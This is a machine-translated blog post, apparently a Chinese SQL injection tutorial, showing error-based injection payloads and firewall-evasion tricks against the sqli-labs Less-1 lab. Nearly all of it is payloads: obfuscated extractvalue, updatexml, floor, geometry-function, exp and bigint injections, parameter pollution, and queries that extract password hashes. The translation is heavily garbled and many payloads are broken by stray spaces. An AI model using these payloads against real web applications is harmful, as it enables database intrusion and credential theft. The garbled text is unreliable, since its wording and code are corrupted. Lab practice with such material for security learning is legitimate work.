In fact, being given the injection is very strong, there are many online error injection speaking, grammar there, but very few people around to explain the error injection waf, so today I have a small test chopper, talk about my own views
I based on my own opinion to share my own error injection bypasses, let's go
We still based on less-1, the first is the first statement (extractvalue)
I will not elaborate principle, but we still have to understand clearly the principles, or use someone else's stuff
? The first: http: //127.0.0.1/sql/Less-1/ id = 1 'and extractvalue (1, concat (0x7e, (select database ()), 0x7e)) - +
Based waf, it will be something which sensitive filter it?
There may be single quotes, and, extractvalue, database
Then we split one by one
(1) and to the first associate is & && = 26% by encoding bypassing, and then is injected to the associated bypass encoding / *! && * / / *! * 26% 26% / / *! 50000 && * / / *! 50000% 26% 26 * /
This is based on the filtered and payload 127.0.0.1/sql/Less-1/?id=-1 '/ *! 50000% 26% 26 * / extractvalue (1, concat (0x7e, (select database ()), 0x7e) ) - + // analogy is true or and xor
All error injection and may have been replaced or xor and easily change the look Ps: we know or = || course or = |
(2) Then there extractvalue, this how we can bypass it
The first is sensitive to bypass extRactvAlue, is not necessarily the case because all the functions of waf regular expressions are included.
The second is the inline comments, comments within Gong good, / * 50000% 26% 26 * / / * 50000extRactvAlue * / (1, concat (0x7e, (select database ()), 0x7e)) -!! + .
The third is a special symbol to bypass,
! 1./*!50000%26%26*/ / * 50000`extRactvAlue` * / (1, concat (0x7e, (select database ()), 0x7e)) - + help us bypass the anti quotes
2./*!50000%26%26*/!!!/*!50000`extRactvAlue`*/(1,concat(0x7e,(select database ()), 0x7e)) - + bypassed using exclamation
3.% 0bor% 0b (extractvalue (1, concat (0x7e, (select database ()), 0x7e))) - +% 0b to bypass using
4./*!50000%26%26*/!!!/*!50000`extRactvAlue`*/(1,concat(0x7e,(select database ()), 0x7e)) / * 50000 * / -! + followed by the inline comments
(3) then that database
Based database to bypass refer to my first article
(4) using the parameter contamination bypass hpp
/ * & Id = 'and (extractvalue (1, concat (0x7e, (select user ()), 0x7e))) - + * / // then we can tinker with the parameters pollution inside, we all know it
After this course, we did not get around, it is normal, ha ha ha ha, and then the next you need to use the law as a whole
(1) The first is the use of procedure analyse analytical method
procedure analyse (extractvalue (rand (), concat (0x3a, database ())), 1) - + // rand () is to generate a random number between 0 and 1, for the rand function if you have the impression that friends will certainly think of the floor being given, of course, we can also add that we just on the basis of pro method
procedure% 23% 0aanalyse (/ *! 50000`extractvalue` * / (rand (), `concat` (0x3a, database / ** / (/ *! 50000 * /))), 1) / *! 11340 * / - + this bypass, the use of combination punches
ps this: when we look-up table, from information_schema.tables where table_schema = 'security' we can put security into a hex code, because some waf is sensitive to its own database table names. Yes extractvalue updatexml query and have a length limitation, the password query when we are md5 value, we query is up to 31, there is a do not know, that zezheng, we need to use method to use md5 see, for instance we took updatexml
and updatexml (1, concat (0x7e, substr ((select md5 (password) from users limit 1,1), 17,32), 0x7e), 1) - + 17 and 32 are taken length
(2) conversion functions, in addition to our error injection extractvalue, there are other functions, there are many ways to bypass, we want flexible
The second: and (select 1 from (select count (*), concat (database (), floor (rand (0) * 2)) x from information_schema.tables group by x) a) - + we can use floor What error function given by injection method to bypass the reference extractvalue, I have here a summary on
Third: and (updatexml (1, concat (0x7e, (select database ()), 0x7e), 1)) - +
Fourth: and geometrycollection ((select * from (select * from (select database ()) a) b)) - + // 456789 later are the same, only the function name changed
第五个:and multipoint((select * from(select * from(select database())a)b))--+
第六个:and polygon((select * from(select * from(select database())a)b))--+
第七个:and multipolygon((select * from(select * from(select database())a)b))--+
第八个:and linestring((select * from(select * from(select database())a)b))--+
第九个:and multilinestring((select * from(select * from(select database())a)b))--+
ps: I did not say these functions to bypass the payload, because carefully read what I wrote extractvalue bypass, are common to the other error function, because the new name, it is important modifications, is looking waf which method with which a filter function, these are what we are about the essence of waf
Tenth: and exp (~ (select * from (select database ()) a)) - + // exp given using the foregoing joint detection injection point, 1-exp (11111) the injection point is determined based on this principle
and !!! `exp` (~ (select * from (select database ()) a)) - + // exp can backticks
Eleventh: union select ((select * from (select database ()) x) - ~ 0!), 2,3 - + // use bigint given, union select can be bypassed
Twelfth: or 1 group by concat_ws (0x7e, database (), floor (rand (0) * 2)) having min (0) or 1 - + floor modification
Of course, my conclusion is just one-sided, if we want to become stronger, you can read more articles, manuals specializes in mysql, and life-long learning